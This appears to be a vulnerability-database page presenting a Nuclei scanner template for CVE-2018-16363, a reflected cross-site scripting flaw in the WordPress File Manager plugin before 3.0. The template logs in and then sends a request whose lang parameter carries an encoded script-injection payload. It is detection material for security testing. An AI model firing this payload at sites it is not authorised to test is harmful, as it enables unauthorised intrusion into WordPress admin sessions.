Lucene search
K

WordPress File Manager < 3.0 - Cross-Site Scripting

🗓️ 09 Feb 2026 09:43:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 6 Views

Authenticated reflected cross-site scripting in WordPress File Manager plugin before 3.0 via lang parameter.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2018-16363
10 Feb 202621:02
circl
CNVD
WordPress mndpsingh287 File Manager plugin cross-site scripting vulnerability
11 Sep 201800:00
cnvd
CVE
CVE-2018-16363
7 Sep 201822:00
cve
Cvelist
CVE-2018-16363
7 Sep 201822:00
cvelist
EUVD
EUVD-2018-8209
7 Oct 202500:30
euvd
NVD
CVE-2018-16363
7 Sep 201822:29
nvd
OpenVAS
WordPress File Manager Plugin < 3.0 XSS Vulnerability
10 Feb 202500:00
openvas
OSV
CVE-2018-16363
7 Sep 201822:29
osv
Patchstack
WordPress File Manager plugin <= 2.9 - Authenticated Cross-Site Scripting (XSS) vulnerability
9 Sep 201800:00
patchstack
Prion
Cross site request forgery (csrf)
7 Sep 201822:29
prion
Rows per page
id: CVE-2018-16363

info:
  name: WordPress File Manager < 3.0 - Cross-Site Scripting
  author: Shivam Kamboj
  severity: medium
  description: |
    WordPress File Manager plugin before 3.0 is vulnerable to authenticated reflected cross-site scripting (XSS) via the lang parameter in the admin dashboard. The parameter is directly echoed into a JavaScript context without proper sanitization.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16363
    - https://wpscan.com/vulnerability/65e4849b-6517-400d-884f-65234f58ab0c/
    - https://plugins.trac.wordpress.org/changeset/1936043
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16363
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2018,xss,wp-file-manager,wordpress,wp,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=wp_file_manager&lang=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "</script><script>alert(document.domain)</script>", "var fmlang", "wp-file-manager")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100c54762c0d9ce4414e3a31675a9add037e15e19046e7c02c81fbabbdc276287a102204e13d900170982a88337ffc1745c09601e57fd94e87fdab7b49fb176010869f7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 19:27Current
5.1Medium risk
Vulners AI Score5.1
CVSS 23.5
CVSS 35.4
EPSS0.01383
6